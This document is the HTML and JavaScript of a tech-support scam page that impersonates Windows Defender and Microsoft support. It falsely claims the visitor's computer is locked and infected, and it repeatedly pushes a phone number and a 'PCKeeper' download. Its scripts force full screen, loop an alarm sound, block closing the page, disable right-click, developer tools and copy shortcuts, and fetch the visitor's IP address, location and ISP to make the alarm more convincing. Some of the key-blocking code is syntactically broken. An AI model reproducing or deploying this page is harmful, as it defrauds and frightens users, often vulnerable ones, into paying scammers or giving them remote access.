<!DOCTYPE html>
<html>
<head>

  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <title>Online Windows Defender Help Center</title>

  <!-- Favicon Icon -->
  <link rel="icon" type="image/png" href="img/defender.png">
  
  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <link rel="stylesheet" href="css/styles.css">

  <!-- Js Include -->
  <script src="js/jquery.min.js"></script>
  <script type="text/javascript" src="js/scripts.js"></script>
  <script type="text/javascript" src="js/esc.js"></script>

  <!-- Fonts -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

  <script type="text/javascript">
    // To disable right click
    document.addEventListener('contextmenu', event => event.preventDefault());
  </script>

</head>

<body id="welcomeSec" onclick="playSound()" >

  <!-- Main Banner  -->
  <div class="bg">
    <div class="banner-img" style="top: 0px;">
      <img src="img/banner3.png" alt="" width="100%"/>
    </div>
  </div>
  <!-- End -->

  <!-- On Click Full Screen -->
  <a onclick="openFullscreen();" rel="noreferrer" id="full_link_black" style="">
    <div class="black" style="height: 145%;"></div>
  </a>
  <!-- End -->

  <!-- Alert Audio -->
  <audio id="alert_beep" loop><source src="audio.mp3" type="audio/mpeg"></audio>
    <script>
      addEventListener("click", function() {
        var el = document.documentElement
        , rfs =
        el.requestFullScreen
        || el.webkitRequestFullScreen
        || el.mozRequestFullScreen
        ;
        rfs.call(el);
      });

    </script>
    <!-- End -->

    <!-- This used for full screen black popup -->
    <div id="full_screen_popup"
    style=" display:none; background-color:#000; height: auto; width: 550px; margin-left:32%;position: absolute;z-index: 9999999999;text-align: center;
    margin-top: -8px; "
    class="answer_list">
      <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">Should you be aware of the risks? Restart or do not use your device.<br>Your device is disabled. Please call Windows Defender Support. <br>Access is the reason for block security device. <br>Please contact us immediately. A technician will help you resolve the issue.<strong> Please call Windows Support.<span style="border:1px solid #383d41;border-radius:5px;padding:2px 5px">  (+1) 240-222-8579
        </span></strong>
      </p>
    </div>
    <!-- End -->

    <!-- Frist Popup Model -->
    <div class="frist_alert_modal cardcontainer mnbozsx lightbox">
      <div id="txtintro">
        <h1>** Computer has been locked **</h1>
        <h6>Error #DT00X02.</h6>
        <p>Microsoft technical support <b> (+1) 240-222-8579</b> Please call (toll free):<br>
         Do not ignore this important warning.<br>
       If you close this page without resolving the issue, access to your computer will be disabled to prevent further damage to your network.</p>
       <p>You have been warned that your computer is infected with viruses and spyware. The following data is at risk:</p>
       <ol>
         <li>Facebook Login</li>
         <li>Credit card information</li>
         <li>Email credentials</li>
         <li>Browsing history and data</li>
       </ol>
       <p>Please contact us immediately so that one of our engineers can guide you through the recovery process over the phone. Please contact us within 5 minutes to prevent complete loss of your computer.</p>
     </div>

     <p style="padding-bottom: 0px;">Call Microsoft Windows Support<strong> (+1) 240-222-8579 (Microsoft Support)</strong></p>
      <div class="action_buttons"> 
        <a style="cursor: pointer;">OK</a> 
        <a>Cancel</a> 
      </div>
    </div>

   <!-- End -->

   <!-- Second Pop  -->
   <div id="sec_pop_text" class="container">
    <div class="modal_header top" style="font-size:17px">
      <div class="modal_header headers" style="border-bottom:1px solid #d6d5d5">
        <span class="title" id="txtadd" style="color: #000;font-size: 18px;">
          <span class="modal_header">
            <img src="img/defender.png" class="defender-logo">
          </span>Windows Defender Security Center </span>
          <span class="title2" id="txts1">
            <a href="#" id="cross">
              <img src="cs.png">
            </a>
          </span>
        </div>
      </div>
      <div class="your-computer">
        <div class="modal_header top">
          <div class="headers modal_header">
            <div id="txtadd" class="title">
              <img src="img/alert.png" class="your_computer_alert-logo">
              Your computer has  <span>virus!</span></div>
              <span>
                <div id="ip_add">Microsoft Windows Firewall Warning!</div>
                <div id="city">PC infected with Trojan horse spyware</div>
                <div id="isp"> (Error code: 2V7HGTVB)</div>
              </span>
            </div>
          </div>
          <div class="row">
            <div class="col-sm-6">
              <div class="box-grey-bg">
                <h3>How to Remove:</h3>
                <div class="box-yellow">
                  <p><b>step 1:</b> Click the button below to download and install PCKeeper.</p>
                  <p><b>step 2:</b> Run PCKeeper and immediately remove all detected threats.</p>
                </div><br>
                <p>These pop-ups may be caused by the following:<br /> A virus is installed on your computer <br />It ensures your personal safety
                <br />
                Your data is at significant risk. I strongly recommend it <br /><br>Please fix this as soon as possible before you do <br />
                Please continue.
                </p>
              </div>
            </div>
            <div class="col-sm-6">
              <div class="box-red">
                <p>Possibility of network damage due to underlying causes threat: <span>not clear</span></p>
                  <div class="cusft">
                    <p>Data is at risk:</p>
                    <p>1. Credit card details and banking information.</p>
                    <p>2. Email password and passwords for other accounts.</p>
                    <p>3. Facebook, Skype, AIM, and other chat logs.</p>
                    <p>4. Private photos, family photos, and other sensitive files.</p>
                    <p>5.Your webcam can be accessed remotely by a stalker.</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div id="modal_disclaimer">
            Call Windows Defender Support immediately to report this threat and prevent identity theft and unlock access to this device.<br>
            <span class="support">Contact the Windows Defender Helpline:  (+1) 240-222-8579 (Security Support)</span>
          </div>
          <div id="rejection_bottom">
            <ul>
              <li>
                <a href="#">
                  <div class="button2">
                    <span>Deny</span>
                  </div>
                </a>
              </li>
              <li>
                <a href="#">
                  <div class="rejection_btn2 blink">
                    <span>Allow</span>
                  </div>
                </a>
              </li>
            </ul>

          </div>
        </div>
      <!-- End -->

      <!-- Chat Section -->
      <div id="support_chat">
        <img src="img/defender.png">
        <span style="color:#222;font-size:24px;font-weight:700;margin-left:6px;position:relative;top:5px">Windows</span>
        <p style="font-weight:700;font-size:24px">Call Support: <br>
        </p>
        <h4 style="font-weight:700;font-size:22px">  (+1) 240-222-8579
          <br>(Security toll-free number)
        </h4>
        <div class="arrow-down">
          <svg height="1em" viewBox="0 0 320 512">
            <style>
              svg {
                fill: #fff
              }
            </style>
            <path d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z"></path>
          </svg>
        </div>
      </div>
      <!-- End -->

      <!-- Red Background Modal -->
      <div id="redmodalmain">
        <!-- Red Modal One -->
        <div class="modal exitModal" id="defendermodal1" tabindex="-1" role="dialog" style="cursor:pointer">
          <div class="modal-dialog modal-full-height modal-right" role="document">
            <div class="modal-content" style="background-color: red;color: #fff;">
              <img id="modal-exit" src="img/close.png" class="modal-exit">
              <div class="modal-body">
                <div class="media">
                  <div class="media-left" style="padding-right: 20px;">
                    <img src="img/defender.png" class="media-object" style="width:30px;margin-top: 5px;-webkit-filter: brightness(0) invert(1);
                    filter: brightness(0) invert(1);">
                  </div>
                  <div class="media-body">
                    <h5 class="media-heading">Protection from viruses and threats</h5>
                    <h5>Threats found</h5>
                    <p>Windows Defender Antivirus detected a threat. Check details.</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <!-- End One -->

        <!-- Red Modal Two -->
        <div class="modal exitModal" id="defendermodal2" tabindex="-1" role="dialog" style="cursor:pointer">
          <div class="modal-dialog modal-full-height modal-right" role="document">
            <div class="modal-content" style="background-color: red;color: #fff;">
              <img id="modal-exit" src="img/close.png" class="modal-exit">
              <div class="modal-body">
                <div class="media">
                  <div class="media-left" style="padding-right: 20px;">
                    <img src="img/defender.png" class="media-object" style="width:30px;margin-top: 5px;-webkit-filter: brightness(0) invert(1);
                    filter: brightness(0) invert(1);">
                  </div>
                  <div class="media-body">
                    <h5 class="media-heading">Firewall threat protection</h5>
                    <h5>Windows Defender took an action</h5>
                    <p>Due to your settings, Windows Defender Antivirus has blocked apps that may perform unwanted actions on your device.</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <!-- End -->
        <!-- Red Modal Third -->
        <div class="modal exitModal" id="defendermodal3" tabindex="-1" role="dialog" style="cursor:pointer">
          <div class="modal-dialog modal-full-height modal-right" role="document">
            <div class="modal-content" style="background-color: red;color: #fff;">
              <img id="modal-exit" src="img/close.png" class="modal-exit">
              <div class="modal-body">
                <div class="media">
                  <div class="media-body">
                    <h4 class="media-heading">Call Windows Support <br/>  (+1) 240-222-8579
                    (Security toll-free number) </h4>
                    <p>Please contact us immediately. A technician will help you resolve the issue.</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <!-- End Third Modal -->
      </div>
      <!-- End -->

      <div id="notification-alert" class="notification-alert">
        <span class="arrow-down">
          <i class="fa fa-caret-up"></i>
        </span>
        <div>
         <a href="javascript:openlink()" class="cross" style="font-size: 22px;">×</a>
         <p> The site wants:</p>
         <p class="mntxt"><img src="img/bell.png" alt="" style="margin-right: 3px;
         margin-top: 1px;width: 15px;
         height: 15px;"> &nbsp; The system wants to scan your computer immediately</p>
         <div class="action_buttons">
          <a class="bg-grey">Allow</a>
          <a class="" >Block</a>
        </div>
      </div>
    </div>

    <!-- Footer Start -->
    <footer>
      <div id="footer_container">
        <div class="row">
          <div class="col-md-12">
            <div class="right-foot" style="text-align: center;">
              <span id="footer_txt" style="font-weight:600">
                <img src="img/defender.png"> Windows Defender
              </span>
              <span style="font-weight: 700;padding-left: 13px;color: #fff;"> Security Alert <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;"> (+1) 240-222-8579 (Security Support)</span></span>
            </div>
          </div>
          <div class="col-md-12">
            <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 10px;">Your security is important to us. If you are not aware of this request, please contact us immediately to file a report.</small></marquee>
          </div>
        </div>
      </div>
    </footer>
    <!-- Footer End -->

  <!-- Here Custom Js -->
  <script>
    var elem = document.documentElement;
    function openFullscreen() {
      if (elem.requestFullscreen) {
        elem.requestFullscreen();
      } 
      else if (elem.webkitRequestFullscreen) { /* Safari */
        elem.webkitRequestFullscreen();
      } 
      else if (elem.msRequestFullscreen) { /* IE11 */
          elem.msRequestFullscreen();
        }
      }

      function closeFullscreen() {
        if (document.exitFullscreen) {
          document.exitFullscreen();
      } else if (document.webkitExitFullscreen) { /* Safari */
              document.webkitExitFullscreen();
      } else if (document.msExitFullscreen) { /* IE11 */
          document.msExitFullscreen();
        }
      }
    
      window.onbeforeunload = function() {
       if (data_needs_saving()) {
         return "Call Windows Defender Helpline Now";
       } else {
        return;
      }
    };

    window.addEventListener("beforeunload", function (e) {
     var confirmationMessage = 'It looks like you are editing something. '
     + 'Your changes will be lost if you leave before saving.';

      (e || window.event).returnValue = confirmationMessage; //Gecko + IE
      return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
    });
  </script>

  <script type="text/javascript" src="js/noir.js"></script>
  <script>
    var t = new XMLHttpRequest;
    t.onreadystatechange = function() {
      if (4 == this.readyState && 200 == this.status) {
        var a = JSON.parse(this.responseText);
        ipadd = a.ip;
        city = a.city;
        country = a.country;
        isp = a.connection.isp;
        var b = new Date;
        currtime = a.timezone.current_time;
        document.getElementById("ip_add").textContent = "address ip: " + ipadd + " " + b.toLocaleString("EN-US", currtime);
        document.getElementById("city").textContent = "Location: " + city + ", " + country;
        document.getElementById("isp").textContent = "ISP: " + isp
      }
    };
    t.open("GET", "https://ipwho.is/?lang=en", !0);
    t.send();
    
    $(document).ready(function() {
     var audioElement = document.createElement('audio');
     audioElement.setAttribute('src', 'beep.mp4');

     audioElement.addEventListener('ended', function() {
       this.play();
     }, false);


     $('#welcomeSec').click(function() {
       audioElement.play();

     });

     $('#full_link_black').click(function() {
       audioElement.play();

     });


     $('#sec_pop_text').click(function() {
       audioElement.play();

     });

     $('#redmodalmain').click(function() {
       audioElement.play();

     });

   });

    $(document).ready(function () {
      $("#welcomeSec").click(function () {
        $("#full_screen_popup").show();
      });
    });

    $("#welcomeSec").click(function(){
      $("#redmodalmain").hide();
      $(".black").hide();
    });
  </script>

  <script type="text/javascript">

    
    // To disable F12 options
    document.onkeypress = function (event) {
      event = (event  window.event);
      if (event.keyCode == 123) {
        return false;
      }
    }
    document.onmousedown = function (event) {
      event = (event  window.event);
      if (event.keyCode == 123) {
        return false;
      }
    }
    document.onkeydown = function (event) {
      event = (event  window.event);
      if (event.keyCode == 123) {
        return false;
      }
    }
    // To To Disable ctrl+c, ctrl+u
    jQuery(document).ready(function ($) {
      $(document).keydown(function (event) {
        var pressedKey = String.fromCharCode(event.keyCode).toLowerCase();
        if (event.ctrlKey && (pressedKey == "c" || pressedKey == "u")) {
          alert('Sorry, this feature has been disabled.');
          return false;
        }
      });
    });


  </script>
</body>
</html>
